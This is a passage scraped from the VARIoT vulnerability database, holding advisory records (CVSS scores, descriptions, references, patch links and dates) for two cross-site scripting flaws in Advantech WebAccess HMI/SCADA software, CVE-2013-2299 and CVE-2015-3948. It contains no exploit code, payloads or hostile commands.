{ "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Antu Sanadi of SecPod Technologies", "sources": [ { "db": "BID", "id": "57227" }, { "db": "CNNVD", "id": "CNNVD-201301-127" } ], "trust": 0.9 }, "cve": "CVE-2013-2299", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2013-2299", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "bd2522e8-2352-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "VHN-62301", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-2299", "trust": 1.0, "value": "LOW" }, { "author": "NVD", "id": "CVE-2013-2299", "trust": 0.8, "value": "Low" }, { "author": "CNNVD", "id": "CNNVD-201301-127", "trust": 0.6, "value": "LOW" }, { "author": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "LOW" }, { "author": "VULHUB", "id": "VHN-62301", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-62301" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "CNNVD", "id": "CNNVD-201301-127" }, { "db": "NVD", "id": "CVE-2013-2299" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site scripting (XSS) vulnerability in Advantech WebAccess (formerly BroadWin WebAccess) before 7.1 2013.05.30 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess HMI/SCADA has an unidentified cross-site script. Advantech WebAccess HMI/SCADA is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. \nAdvantech WebAccess HMI/SCADA 7.0 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2013-2299" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "CNVD", "id": "CNVD-2013-00217" }, { "db": "BID", "id": "57227" }, { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-62301" } ], "trust": 2.7 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-62301", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-62301" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-2299", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-13-225-01", "trust": 2.5 }, { "db": "BID", "id": "57227", "trust": 1.6 }, { "db": "CNNVD", "id": "CNNVD-201301-127", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2013-00217", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2013-003848", "trust": 0.8 }, { "db": "IVD", "id": "BD2522E8-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "EXPLOIT-DB", "id": "23968", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-77711", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-62301", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2013-00217" }, { "db": "VULHUB", "id": "VHN-62301" }, { "db": "BID", "id": "57227" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "CNNVD", "id": "CNNVD-201301-127" }, { "db": "NVD", "id": "CVE-2013-2299" } ] }, "id": "VAR-201308-0031", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2013-00217" }, { "db": "VULHUB", "id": "VHN-62301" } ], "trust": 1.61735348 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2013-00217" } ] }, "last_update_date": "2024-08-14T15:08:53.513000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.com/default.aspx" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Advantech\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "trust": 0.8, "url": "http://www.advantech.co.jp/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003848" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-62301" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "NVD", "id": "CVE-2013-2299" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://ics-cert.us-cert.gov/advisories/icsa-13-225-01" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2299" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-2299" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/57227/" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/57227" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-00217" }, { "db": "VULHUB", "id": "VHN-62301" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "CNNVD", "id": "CNNVD-201301-127" }, { "db": "NVD", "id": "CVE-2013-2299" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2013-00217" }, { "db": "VULHUB", "id": "VHN-62301" }, { "db": "BID", "id": "57227" }, { "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "db": "CNNVD", "id": "CNNVD-201301-127" }, { "db": "NVD", "id": "CVE-2013-2299" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-01-14T00:00:00", "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "date": "2013-01-14T00:00:00", "db": "CNVD", "id": "CNVD-2013-00217" }, { "date": "2013-08-22T00:00:00", "db": "VULHUB", "id": "VHN-62301" }, { "date": "2013-01-09T00:00:00", "db": "BID", "id": "57227" }, { "date": "2013-08-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "date": "2013-01-11T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-127" }, { "date": "2013-08-22T05:34:59.940000", "db": "NVD", "id": "CVE-2013-2299" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-01-14T00:00:00", "db": "CNVD", "id": "CNVD-2013-00217" }, { "date": "2013-08-23T00:00:00", "db": "VULHUB", "id": "VHN-62301" }, { "date": "2013-08-14T06:06:00", "db": "BID", "id": "57227" }, { "date": "2013-08-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003848" }, { "date": "2013-08-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-127" }, { "date": "2013-08-23T13:37:02.987000", "db": "NVD", "id": "CVE-2013-2299" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-127" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess HMI/SCADA Unknown Cross-Site Scripting Vulnerability", "sources": [ { "db": "IVD", "id": "bd2522e8-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201301-127" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-127" } ], "trust": 0.6 } }
var-201601-0642
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0642", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNNVD", "id": "CNNVD-201601-322" }, { "db": "NVD", "id": "CVE-2015-3948" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006786" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2015-3948", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2015-3948", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CNVD-2016-00427", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "64e67164-2351-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "VHN-81909", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.3, "id": "CVE-2015-3948", "impactScore": 2.7, "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-3948", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2015-3948", "trust": 0.8, "value": "Low" }, { "author": "CNVD", "id": "CNVD-2016-00427", "trust": 0.6, "value": "LOW" }, { "author": "CNNVD", "id": "CNNVD-201601-322", "trust": 0.6, "value": "LOW" }, { "author": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "LOW" }, { "author": "VULHUB", "id": "VHN-81909", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "VULHUB", "id": "VHN-81909" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNNVD", "id": "CNNVD-201601-322" }, { "db": "NVD", "id": "CVE-2015-3948" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site scripting (XSS) vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2015-3948" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-81909" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3948", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-322", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00427", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006786", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64E67164-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-81909", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "VULHUB", "id": "VHN-81909" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNNVD", "id": "CNNVD-201601-322" }, { "db": "NVD", "id": "CVE-2015-3948" } ] }, "id": "VAR-201601-0642", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "VULHUB", "id": "VHN-81909" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" } ] }, "last_update_date": "2024-11-23T21:43:22.990000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Cross-Site Scripting Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70372" }, { "title": "Advantech WebAccess Fixes for cross-site scripting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59640" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNNVD", "id": "CNNVD-201601-322" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-81909" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "NVD", "id": "CVE-2015-3948" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3948" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3948" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "VULHUB", "id": "VHN-81909" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNNVD", "id": "CNNVD-201601-322" }, { "db": "NVD", "id": "CVE-2015-3948" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "VULHUB", "id": "VHN-81909" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "db": "CNNVD", "id": "CNNVD-201601-322" }, { "db": "NVD", "id": "CVE-2015-3948" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00427" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-81909" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-322" }, { "date": "2016-01-15T03:59:03.403000", "db": "NVD", "id": "CVE-2015-3948" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00427" }, { "date": "2016-01-20T00:00:00", "db": "VULHUB", "id": "VHN-81909" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006786" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-322" }, { "date": "2024-11-21T02:30:07.377000", "db": "NVD", "id": "CVE-2015-3948" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-322" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Cross-Site Scripting Vulnerability", "sources": [ { "db": "IVD", "id": "64e67164-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00427" }, { "db": "CNNVD", "id": "CNNVD-201601-322" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-322" } ], "trust": 0.6 } }
var-201202-0213
Vulnerability from variot
